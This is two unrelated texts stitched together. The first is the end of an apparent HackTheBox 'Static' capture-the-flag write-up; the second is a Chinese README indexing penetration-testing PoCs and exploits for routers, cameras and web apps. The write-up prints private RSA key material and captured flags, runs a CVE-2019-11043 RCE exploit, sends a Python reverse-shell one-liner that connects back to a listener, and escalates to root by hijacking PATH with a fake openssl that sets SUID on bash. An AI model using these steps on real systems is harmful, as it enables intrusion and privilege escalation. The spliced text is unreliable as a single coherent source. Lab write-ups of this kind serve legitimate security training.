Amvx+AECgYEA6OOd9dgqXR/vBaxDngWB6ToVysWDjO+QsjO4OpFo7AvGhMRR+WpK
qbZyJG1iQB0nlAHgYHEFj4It9iI6NCdTkKyg2UzZJMKJgErfgI0Svkh/Kdls23Ny
gxpacxW3d2RlyAv4m2hG4n82+DsoPcN+6KxqGRQxWywXtsBsYkRb+wkCgYEA53jg
+1CfGEH/N2TptK2CCUGB28X1eL0wDs83RsU7Nbz2ASVQj8K0MlVzR9CRCY5y6jcq
te1YYDiuFvT+17ENSe5fDtNiF1LEDfp45K6s4YU79DMp6Ot84c2fBDIh8ogH0D7C
CFdjXCI3SIlvc8miyivjRHoyJYJz/cO94DsTE0ECgYA1HlWVEWz4OKRoAtaZYGA1
Ng5qZYqPxsSWIL3QfgIUdMse1ThtTxUgiICYVmqmfP/d/l+TH7RI+0RIc54a7y1c
PkOhzKlqfQSnwmwgAg1YYWi/vtvZYgeoZ4Zh4X4rOTcN3c0ihTJFzwZWsAeJruFv
aIP6nGR1iyUNhe4yq6zfIQKBgANYQNAA2zurgHeZcrMUqsNdefXmB2UGPtKH9gGE
yhU9tMRReLeLFbWAfJj2D5J2x3xQ7cIROuyxBPr58VDGky2VTzRUo584p/KXwvVy
/LaJiVM/BgUCmhxdL0YNP2ZUxuAgeAdM0/e52time8DNkhefyLntlhnqp6hsEqtR
zzXBAoGBANB6Wdk/X3riJ50Bia9Ai7/rdXUpAa2B4pXARnP1/tw7krfPM/SCMABe
sjZU9eeOecWbg+B6RWQTNcxo/cRjMpxd5hRaANYhcFXGuxcg1N3nszhWDpHIpGr+
s5Mwc3oopgv6gMmetHMr0mcGz6OR9KsH8FvW1y+DYY3tUdgx0gau
-----END RSA PRIVATE KEY-----
```
Let's use it:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ ssh -i id_rsawww [email protected]
load pubkey "id_rsawww": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Jun 14 08:00:30 2021 from 10.10.14.4
www-data@web:~$ cd ..
www-data@web:/home$ pwd
/home
www-data@web:/home$ cat user.txt
8f43b1217463d97de0656b2320f8a17c
```
And we get the user flag ```8f43b1217463d97de0656b2320f8a17c```.
We can use this private key also on with machine IP:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ ssh -i id_rsawww [email protected] -p 2222
load pubkey "id_rsawww": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Tue Nov 2 20:09:29 2021 from 172.30.0.9
www-data@web:~$
```
### Root
As we can see on the portal we have another interface with IP ```192.168.254.3```:
![panel.JPG](images/panel.JPG)
Let's make port forwarding to access this interface:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ ssh -N -L 8888:192.168.254.3:80 -i id_rsawww [email protected] -p 2222
```
Now, When we access to [http://localhost:8888](http://localhost:8888) we can see the following web page:
![port8888.JPG](images/port8888.JPG)
If we look at the HTTP response to this web page we can see:
```HTTP
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 02 Nov 2021 20:37:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP-FPM/7.1
Content-Encoding: gzip
```
As we can see It's powered by ```PHP-FPM/7.1``` , We know about ```CVE-2019-11043``` related to ```PHP-FPM```, Let's exploit it using [https://github.com/theMiddleBlue/CVE-2019-11043](https://github.com/theMiddleBlue/CVE-2019-11043):
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ git clone https://github.com/theMiddleBlue/CVE-2019-11043.git
┌─[evyatar@parrot]─[/hackthebox/Static/CVE-2019-11043]
└──╼ $ python3 exploit.py --url http://localhost:8888/index.php
[*] QSL candidate: 1754, 1759, 1764
[*] Target seems vulnerable (QSL:1754/HVL:219): PHPSESSID=fcb5057679c9e6fac09fe95876979e63; path=/
[*] RCE successfully exploited!
You should be able to run commands using:
curl http://localhost:8888/index.php?a=bin/ls+/
```
Now we can get RCE, We want to get a reverse shell, to do so we need to listen from the target machine and not from our host.
Let's upload to the target machine the ```exploit.py``` script and [nc](https://github.com/H74N/netcat-binaries/blob/master/nc) using ```scp```:
```console
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ scp -P 2222 -i ../id_rsawww nc [email protected]:/home/www-data/exp/nc
nc 100% 762KB 51.0KB/s 00:14
┌─[evyatar@parrot]─[/hackthebox/Static]
└──╼ $ scp -P 2222 -i ../id_rsawww exploit.py [email protected]:/home/www-data/exp/exploit.py
exploit.py 100% 4280 13.5KB/s 00:00
```
And let's upload also the following script ```rev.py```:
```console
import requests
rev = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
req = requests.get("http://192.168.254.3/index.php?a="+rev)
print(req.text)
```
Now, Let's open another SSH and listen to port ```9001```:
```console
ww-data@web:~/exp$ ./nc -lvp 9001
listening on [any] 9001 ...
```
And of the first SSH let's run the python script ```rev.py```:
```console
python3 rev.py
<html>
<head><title>504 Gateway Time-out</title></head>
<body bgcolor="white">
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
```
And we get a reverse shell on the second SSH:
```console
www-data@web:~/exp$ nc -lvp 9001
-bash: nc: command not found
www-data@web:~/exp$ ./nc -lvp 9001
listening on [any] 9001 ...
192.168.254.3: inverse host lookup failed: ���fy
connect to [192.168.254.2] from (UNKNOWN) [192.168.254.3] 39230
www-data@pki:~/html$
```
As we saw before, on the web page the file ```batch mode: /usr/bin/ersatool create|print|revoke CN ```, Let's observe this file (This binary running as ```root```):
```console
www-data@pki:~/html$ file /usr/bin/ersatool
file /usr/bin/ersatool
/usr/bin/ersatool: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=961368a18afcdeccddd1f423353ff104bc09e6ae, not stripped
```
By enumerating we found the source code of this binary:
```console
www-data@pki:/usr/bin$ find / -name ersatool.* 2>/dev/null
/usr/src/ersatool.c
```
Let's observe this code:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <libgen.h>
#include <sys/wait.h>
#include <ctype.h>
//easyrsa configuration
char ERSA_DIR[]="/opt/easyrsa";
char TA_KEY[]="/opt/easyrsa/clients/ta.key";
char OUTPUT_DIR[]="/opt/easyrsa/clients";
char BASE_CONFIG[]="/opt/easyrsa/clients/base.conf";
char EXT[]=".ovpn";
//void printCN(char*,int);
void filePrint(char*);
void revokeCN(char*,int);
void createCN(char*,int);
void integrateCN(char*);
void getHelp(char*,int);
void cleanStr(char*);
//deprecated function - prints the CN ovpn config file
//conf file can be printed with inegrateCN(); <- create
void printCN(char *cn, int i){
char fn[100];
char buffer[100];
if(i==1){
printf("print->CN=");
fflush(stdout);
memset(buffer,0,sizeof(buffer));
read(0,buffer,sizeof(buffer));
}
else {
memset(buffer,0,sizeof(buffer));
strncat(buffer,cn,sizeof(buffer));
}
if(!strncmp("\n",buffer,1)) { return; }
do{
strncpy(fn, OUTPUT_DIR,sizeof(fn));
strncat(fn, "/",sizeof(fn)-strlen(fn));
strncat(fn, strtok(basename(buffer),"\n"),sizeof(fn)-strlen(fn));
strncat(fn, EXT, sizeof(fn)-strlen(fn));
printf(buffer); //checking buffer content
filePrint(fn);
if(i==1){
printf("\nprint->CN=");
fflush(stdout);
memset(buffer,0,sizeof(buffer));
read(0,buffer,sizeof(buffer));
}
} while (strncmp("\n",buffer,1) && i==1);
}
void filePrint(char *filename){
int bfsiz=1;
char buffer[bfsiz];
int fd;
ssize_t fr;
memset(buffer,0,bfsiz);
setuid(0); //escalating privileges to read root owned files
if((fd=open(filename,O_RDONLY))<0){
printf("[!] ERR reading %s!\n",filename);
}
while(fr=read(fd,buffer,bfsiz)>0){
printf("%s",buffer);
memset(buffer,0,bfsiz);
}
close(fd);
fflush(stdout);
}
void revokeCN(char *cn, int i){
puts("[!] Not implemented");
fflush(stdout);
}
//creates and prints new CN config file
void createCN(char *cn, int i){
int devNull, sout, serr, pid, status, oid;
char EASYRSA[50];
char buffer[100];
char CMD[100];
char WD[50];
memset(EASYRSA,0,sizeof(EASYRSA));
strcat(EASYRSA,ERSA_DIR);
strcat(EASYRSA,"/easyrsa");
if(i==1){
printf("create->CN=");
fflush(stdout);
memset(buffer,0,sizeof(buffer));
read(0,buffer,sizeof(buffer));
}
else {
memset(buffer,0,sizeof(buffer));
strncat(buffer, cn, sizeof(buffer));
}
if(!strncmp("\n",buffer,1)) { return; }
do{
pid = vfork();
if(pid==0){
char *a[] = {EASYRSA,"build-client-full",strtok(basename(buffer),"\n"),"nopass","batch"};
//forge the command string
cleanStr(a[2]);
sprintf(CMD,"%s %s %.20s %s %s",a[0],a[1],a[2],a[3],a[4]);
sout=dup(STDOUT_FILENO);
serr=dup(STDERR_FILENO);
devNull=open("/dev/null",O_WRONLY);
dup2(devNull,STDOUT_FILENO);
dup2(devNull,STDERR_FILENO);
setuid(0); //escalating privilges to generate required files
chdir(ERSA_DIR);
system(CMD);
exit(0);
}
dup2(sout,STDOUT_FILENO);
dup2(serr,STDERR_FILENO);
close(devNull);
usleep(500000);
integrateCN(buffer);
if(i==1){
printf("create->CN=");
fflush(stdout);
memset(buffer,0,sizeof(buffer));
read(0,buffer,sizeof(buffer));
}
} while (strncmp("\n",buffer,1) && i==1);
}
//print valid ovpnfile for provided cn
void integrateCN(char *cn){
char PKI_DIR[50];
char KEY_DIR[50];
char CRT_DIR[50];
char CA_CERT[50];
char CN_CERT[50];
char CN_KEY[50];
memset(PKI_DIR,0,sizeof(PKI_DIR));
memset(KEY_DIR,0,sizeof(KEY_DIR));
memset(CRT_DIR,0,sizeof(CRT_DIR));
memset(CA_CERT,0,sizeof(CA_CERT));
memset(CN_CERT,0,sizeof(CN_CERT));
memset(CN_KEY,0,sizeof(CN_KEY));
strcat(PKI_DIR,ERSA_DIR);
strcat(PKI_DIR,"/pki");
strcat(KEY_DIR,PKI_DIR);
strcat(KEY_DIR,"/private");
strcat(CRT_DIR,PKI_DIR);
strcat(CRT_DIR,"/issued");
strcat(CA_CERT,PKI_DIR);
strcat(CA_CERT,"/ca.crt");
strcat(CN_CERT,CRT_DIR);
strcat(CN_CERT,"/");
strcat(CN_CERT,basename(cn));
strcat(CN_CERT,".crt");
strcat(CN_KEY,KEY_DIR);
strcat(CN_KEY,"/");
strcat(CN_KEY,basename(cn));
strcat(CN_KEY,".key");
filePrint(BASE_CONFIG);
printf("<ca>\n");
filePrint(CA_CERT);
printf("</ca>\n");
printf("<cert>\n");
filePrint(CN_CERT);
printf("</cert>\n");
printf("<key>\n");
filePrint(CN_KEY);
printf("</key>\n");
printf("key-direction 1\n<tls-auth>\n");
filePrint(TA_KEY);
printf("</tls-auth>\n");
fflush(stdout);
}
void getHelp(char *prog, int i){
if(i==1) {
printf("create|print|revoke|exit\n");
fflush(stdout);
}
else{
printf("batch mode: %s create|print|revoke CN\n",prog);
fflush(stdout);
exit(255);
}
}
//clean non alphanum chars from string to secure
void cleanStr(char *str)
{
unsigned long i = 0;
unsigned long j = 0;
char c;
while ((c = str[i++]) != '\0')
{
if (isalnum(c))
{
str[j++] = c;
}
}
str[j] = '\0';
}
int main(int argc, char **argv){
int interactive=0;
char opt[8];
char *cn;
if(argc!=3 && argc!=1){
getHelp(argv[0],interactive);
}
else if(argc==1){
interactive=1;
printf("# ");
fflush(stdout);
memset(opt,0,sizeof(opt));
read(0,opt,sizeof(opt));
cn=NULL;
}
else {
strncpy(opt,argv[1],sizeof(opt));
cn=argv[2];
}
do {
if(!strncmp("revoke",opt,6)){
revokeCN(cn,interactive);
}
else if (!strncmp("print",opt,5)){
printCN(cn,interactive);
}
else if (!strncmp("create",opt,6)){
createCN(cn,interactive);
}
else if (!strncmp("exit",opt,4)){
exit(0);
}
else{
getHelp(argv[0], interactive);
}
if(interactive==1){
memset(opt,0,sizeof(opt));
printf("# ");
fflush(stdout);
memset(opt,0,sizeof(opt));
read(0,opt,sizeof(opt));
}
} while(interactive==1);
}
```
We need to monitor the binary calls using [pspy64](https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s).
By running the ```pspy``` we found that ```openssl``` was called without giving the full path, Meaning we can change the ```PATH``` to point it to our ```openssl```:
```console
...
2021/06/25 02:46:03 CMD: UID=33 PID=1959 | /usr/bin/ersatool
2021/06/25 02:46:35 CMD: UID=0 PID=1961 | sh -c /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1960 | /usr/bin/ersatool
2021/06/25 02:46:35 CMD: UID=0 PID=1962 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1963 | sed -e s`ENV::EASYRSA`EASYRSA`g -e s`$dir`/opt/easyrsa/pki`g -e s`$EASYRSA_PKI`/opt/easyrsa/pki`g -e s`$EASYRSA_CERT_EXPIRE`36500`g -e s`$EASYRSA_CRL_DAYS`180`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_KEY_SIZE`2048`g -e s`$EASYRSA_DIGEST`sha256`g -e s`$EASYRSA_DN`cn_only`g -e s`$EASYRSA_REQ_COUNTRY`US`g -e s`$EASYRSA_REQ_PROVINCE`California`g -e s`$EASYRSA_REQ_CITY`San Francisco`g -e s`$EASYRSA_REQ_ORG`Copyleft Certificate Co`g -e s`$EASYRSA_REQ_OU`My Organizational Unit`g -e s`$EASYRSA_REQ_CN`ChangeMe`g -e s`$EASYRSA_REQ_EMAIL`[email protected]`g /opt/easyrsa/pki/openssl-easyrsa.cnf
2021/06/25 02:46:35 CMD: UID=0 PID=1964 | /bin/sh /opt/easyrsa/easyrsa build-client-full a nopass batch
2021/06/25 02:46:35 CMD: UID=0 PID=1965 | openssl version
...
```
So let's create our ```opensssl``` on ```/tmp/exp```:
```console
www-data@pki:/tmp/exp$ cat openssl
cat openssl
#!/bin/bash
chmod u+s /bin/bash
```
Now, Let's append this path to ```PATH```:
```console
www-data@pki:/tmp/pwn$ export PATH=/tmp/exp:$PATH
```
Next, Let's run ```ersatool``` to make a call our ```openssl``` as root:
```console
www-data@pki:/tmp/pwn$ ersatool
ersatool
# create
create
create->CN=a
a
client
dev tun9
proto udp
remote vpn.static.htb 1194
resolv-retry infinite
nobind
user nobody
group nogroup
persist-key
persist-tun
...
create->CN=
# exit
exit
```
Now, Let's look at ```/bin/bash``` permission:
```console
www-data@pki:/tmp/pwn$ ls -al /bin/bash
ls -al /bin/bash
-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash
```
Great, Now let's run ```/bin/bash -p``` to get the root flag:
```console
www-data@pki:/tmp/pwn$ /bin/bash -p
/bin/bash -p
bash-4.4# whoami
whoami
root
bash-4.4# cat /root/root.txt
cat /root/root.txt
18dfb4f7a9871458a34beb51f817294a
```
And we get the root flag ```18dfb4f7a9871458a34beb51f817294a```.
|
## <span id="head1"> Penetration_Testing_POC</span>
搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。
**请注意所有工具是否有后门或者其他异常行为,建议均在虚拟环境操作。**
- [ Penetration_Testing_POC](#head1)
- [ 请善用搜索[`Ctrl+F`]查找](#head2)
- [IOT Device&Mobile Phone](#head3)
- [Web APP](#head4)
- [ 提权辅助相关](#head5)
- [ PC](#head6)
- [ tools-小工具集合](#head7)
- [ 文章/书籍/教程相关](#head8)
- [ 说明](#head9)
## <span id="head2"> 请善用搜索[`Ctrl+F`]查找</span>
## <span id="head3">IOT Device&Mobile Phone</span>
- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md)
- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md)
- [D-Link路由器RCE漏洞](./CVE-2019-16920-D-Link-rce.md)
- [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./CVE-2019-13051)
- [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE)
- [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb)
- [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit)](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb)
- [从 Interfaces.d 到 RCE:Mozilla WebThings IoT 网关漏洞挖掘](https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/)
- [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md)
- [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件)](https://www.exploit-db.com/exploits/48158)
- [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5权限提升](https://www.exploit-db.com/exploits/48154)
- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md)
- [CVE-2020-12753-LG 智能手机任意代码执行漏洞](https://github.com/shinyquagsire23/CVE-2020-12753-PoC)
- [CVE-2020-12695-UPnP 安全漏洞](https://github.com/yunuscadirci/CallStranger)
- [79款 Netgear 路由器遭远程接管0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py)
- [dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377](https://github.com/renatoalencar/dlink-dir610-exploits)
- [wacker:一组脚本,可辅助对WPA3接入点执行在线词典攻击](https://github.com/blunderbuss-wctf/wacker)
- [CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析](./books/CVE-2020-24581%20D-Link%20DSL-2888A%20远程命令执行漏洞分析.pdf)-[原地址](https://www.anquanke.com/post/id/229323)
- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md)
- [CNVD-2021-14544:Hikvision 海康威视流媒体管理服务器任意文件读取](https://github.com/Henry4E36/Hikvision)
- [CNVD-2020-25078:D-link 敏感信息泄漏,可以直接获取账户密码查看监控](https://github.com/Henry4E36/D-link-information)
- [ios-gamed-0day](https://github.com/illusionofchaos/ios-gamed-0day)
- [ios-nehelper-wifi-info-0day](https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day)
- [ios-nehelper-enum-apps-0day](https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day)
- [iOS 15.0.1 RCE PoC](https://github.com/jonathandata1/ios_15_rce)
- [CVE-2021-36260:海康威视产品命令注入漏洞](https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html)
- [CVE-2021-33044、CVE-2021-33045 大华摄像头POC](https://github.com/mcw0/DahuaConsole)|[相关分析](https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt)|[登录绕过chrome 插件](https://github.com/bp2008/DahuaLoginBypass)
- [CVE-2021-36260:海康威视命令注入漏洞](https://github.com/rabbitsafe/CVE-2021-36260)|[又一个CVE-2021-36260利用脚本](https://github.com/Cuerz/CVE-2021-36260)
- [CVE-2021-41653:TP-Link TL-WR840N V5(EU) - RCE ](./books/TP-Link%20TL-WR840N%20V5(EU)%20-%20RCE%20-%20CVE-2021-41653.pdf)
- [DirtyPipe-Android:Dirty Pipe root exploit for Android](https://github.com/polygraphene/DirtyPipe-Android)
- [CVE-2022-30075:Tp-Link Archer AX50 Authenticated RCE](https://github.com/aaronsvk/CVE-2022-30075)
- [NotQuite0day:D-Link 1960相关漏洞](https://github.com/star-sg/NotQuite0day)
- [HuaYuReportRCE:华域数广Report组件GetShell](https://github.com/h0r1g/HuaYuReportRCE)
- [IOT_Vul:IOT相关漏洞收集](https://github.com/zhefox/IOT_Vul)
- [CameraHack:批量扫描破解海康威视、大华等摄像头的常见漏洞](https://github.com/WhaleFell/CameraHack)
- [CVE-2022-32832:apple macos 的 apfs 导致内核任意代码执行漏洞](https://github.com/Muirey03/CVE-2022-32832)
- [HookWechatRecall:通过frida工具 拦截 微信撤回Demo](https://github.com/GaoGuohao/HookWechatRecall)
- [IOT_vuln:IOT相关漏洞仓库](https://github.com/EPhaha/IOT_vuln)
- [hikvision_CVE-2017-7921_auth_bypass_config_decryptor:解密受CVE-2017-7921影响的海康威视的配置文件](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
- [CVE-2022-20866:思科自适应安全设备软件和 Firepower 威胁防御软件 RSA 私钥泄漏检查](https://github.com/CiscoPSIRT/CVE-2022-20866)
- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md)
- [Buffer overflow in Xiongmai DVRs](https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/)|[备份](https://web.archive.org/web/20221129205148/https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/)
- [CVE-2023-27350: PaperCut NG身份验证绕过导致的RCE](https://github.com/horizon3ai/CVE-2023-27350)
- [ivms-8700-0day-poc: 海康威视iVMS-8700综合安防管理平台任意文件上传漏洞](https://github.com/spmonkey/ivms-8700-0day-poc)
- [badspin: Android Kernel内存错误引用漏洞](https://github.com/0xkol/badspin)
- [HikvisionIVMSGetShell: 海康威视IVMS综合安防管理平台软件GetShell](https://github.com/Tas9er/HikvisionIVMSGetShell)
- [iot: DIR-816 823g系列路由器的漏洞利用](https://github.com/sek1th/iot)
- [VulIoT: DIR-816 823g系列路由器漏洞利用](https://github.com/726232111/VulIoT)
- [NsePocsuite-lua: 网络摄像头漏洞检测脚本.Nmap (Nse Nmap script engine)](https://github.com/foggyspace/NsePocsuite-lua)
## <span id="head4">Web APP</span>
- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
- [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md)
- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md)
- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md)
- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md)
- [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md)
- [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md)
- [Cobub Razor 0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md)
- [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md)
- [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md)
- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md)
- [DomainMod的XSS集合](DomainMod的XSS集合.md)
- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md)
- [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md)
- [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md)
- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md)
- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md)
- [Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md)
- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md)
- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md)
- [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md)
- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md)
- [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md)
- [MetInfoCMS 5.X版本GETSHELL漏洞合集](MetInfoCMS%205.X版本GETSHELL漏洞合集.md)
- [MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf](./books/MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf)
- [discuz ml RCE 漏洞检测工具](discuz-ml-rce/README.md)
- [thinkphp5框架缺陷导致远程代码执行](thinkphp5框架缺陷导致远程代码执行.md)
- [FineCMS_v5.0.8两处getshell](FineCMS_v5.0.8两处getshell.md)
- [Struts2_045漏洞批量检测|搜索引擎采集扫描](Struts2_045-Poc)
- [thinkphp5命令执行](thinkphp5命令执行.md)
- [typecho反序列化漏洞](typecho反序列化漏洞.md)
- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md)
- [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC)
- [CVE-2019-15107 Webmin RCE](./CVE-2019-15107)
- [thinkphp5 rce漏洞检测工具](./tp5-getshell)
- [thinkphp5_RCE合集](./tp5-getshell/TP5_RCE合集.md)
- [thinkphp3.X-thinkphp5.x](./tp5-getshell/ThinkPHP.md)
- [关于ThinkPHP框架的历史漏洞分析集合](https://github.com/Mochazz/ThinkPHP-Vuln)
- [CVE-2019-11510](./CVE-2019-11510)
- [Redis(<=5.0.5) RCE](./redis-rogue-server)
- [Redis 4.x/5.x RCE(主从复制导致RCE)](https://github.com/Ridter/redis-rce)
- [生成Redis恶意模块so文件配合主从复制RCE达到命令执行](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[相关文章](https://www.freebuf.com/vuls/224235.html)
- [RedisWriteFile-通过 `Redis` 主从写出无损文件,可用于 `Windows` 平台下写出无损的 `EXE`、`DLL`、 `LNK` 和 `Linux` 下的 `OS` 等二进制文件](https://github.com/r35tart/RedisWriteFile)
- [WeblogicScanLot系列,Weblogic漏洞批量检测工具](./WeblogicScanLot)
- [jboss_CVE-2017-12149](./jboss_CVE-2017-12149)
- [Wordpress的拒绝服务(DoS)-CVE-2018-6389](./CVE-2018-6389)
- [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)
- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md)
- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md)
- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md)
- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md)
- [泛微OA管理系统RCE漏洞利用脚本](./泛微OA管理系统RCE漏洞利用脚本.md)
- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md)
- [zentao-getshell 禅道8.2 - 9.2.1前台Getshell](./zentao-getshell)
- [泛微 e-cology OA 前台SQL注入漏洞](./泛微%20e-cology%20OA%20前台SQL注入漏洞.md)
- [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md)
- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md)
- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md)
